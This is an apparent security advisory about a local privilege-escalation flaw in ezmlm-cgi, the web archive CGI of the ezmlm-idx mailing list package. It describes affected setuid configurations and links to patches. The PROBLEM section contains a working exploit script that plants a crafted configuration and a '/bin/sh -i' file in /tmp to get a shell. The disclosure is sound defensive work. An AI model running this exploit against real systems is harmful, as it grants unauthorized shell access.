COMMAND

    ezmlm-cgi

SYSTEMS AFFECTED

    ezmlm-cgi

PROBLEM

    'vort-fu' found following.  Ezmlm  is an easy to use  mailing list
    manager for qmail.  It ships  with a cgi application to allow  for
    list archiving and  reviewal over the  web.  Documentation  states
    that the  cgi should  be installed  suid root,  but in  real world
    environments, many are not likely to blindly setuid root any  file
    they havent coded themselves (and then some).

    ezmlm-0.xx   does   not   include   ezmlm-cgi   in   any  of  it's
    distributions,   instead   ezmlm-cgi    is   available   in    the
    ezmlm-idx-0.xx package from www.ezmlm.org

    Typically this  file is  setuid user  x, allowing  for the  cgi to
    access the mailing list  configurations for that particular  user.
    However, when not installed  suid root, ezmlm-cgi will  attempt to
    read the configuration file  from the cwd instead  of /etc/ezmlm/.
    Thus  one  can  create  their  own  configuration  files  and have
    ezmlm-cgi  execute  any  arbitary  commands  under the euid of the
    file.

    Example code:

        #!/bin/sh
        #
        # ezmlm-cgi
        # vort@wiretapped.net

        cd /tmp
        export HTTP_HOST=x
        export SERVER_NAME=x
        export SCRIPT_NAME=x
        echo "0;1005;/home/2600/list;/tmp/x@/tmp/x;;;;/bin/sh" > /tmp/.ezcgirc
        echo "#!/bin/sh"  >  /tmp/x
        echo "/bin/sh -i" >> /tmp/x
        chmod +x /tmp/x
        /home/2600/2600-cgi/ezmlm-cgi
        rm -rf /tmp/x
        rm -rf /tmp/.ezcgirc

    It  is  interesting  to  note  that  for  a  file which asks to be
    installed  suid  root,  it  doesnt  drop  privs when executing the
    banner directive of the  configuration file nor make  any attempts
    to  read  the  configuration  from  the  base  directory where the
    program is stored.

    Actually having  this script  suid root  will fix  this particular
    bug, but don't be surprised if there are many others in the code.

    Default installations of  ezmlm-idx-0.40 are not  vulnerable since
    ezmlm-cgi  is   not  installed   SUID  by   default.   SUID   root
    installations  are  not  vulnerable  since  ezmlm-cgi uses a fixed
    configuration  file   location  and   drops  privileges   in  this
    execution  mode.   SUID  user  (user  !=  root)  installations are
    discussed  in   the  man   page,  but   should  be   rare.   Their
    vulnerability depends  on group  and world  execute permissions of
    the ezmlm-cgi binary.

    ezmlm-idx-0.40 is an add-on to Dan Bernstein's ezmlm-0.53 package.

SOLUTION

    A patched version of ezmlm-cgi.c, ezmlm-cgi.1 (man page), as  well
    as the patch (ezmlm-cgi.patch) are available from

        ftp://ftp.ezmlm.org/pub/patches/ and http://www.ezmlm.org/pub/patches/

    This  version  removes  the  support  for  the execution of banner
    programs.  HTML banners are still supported.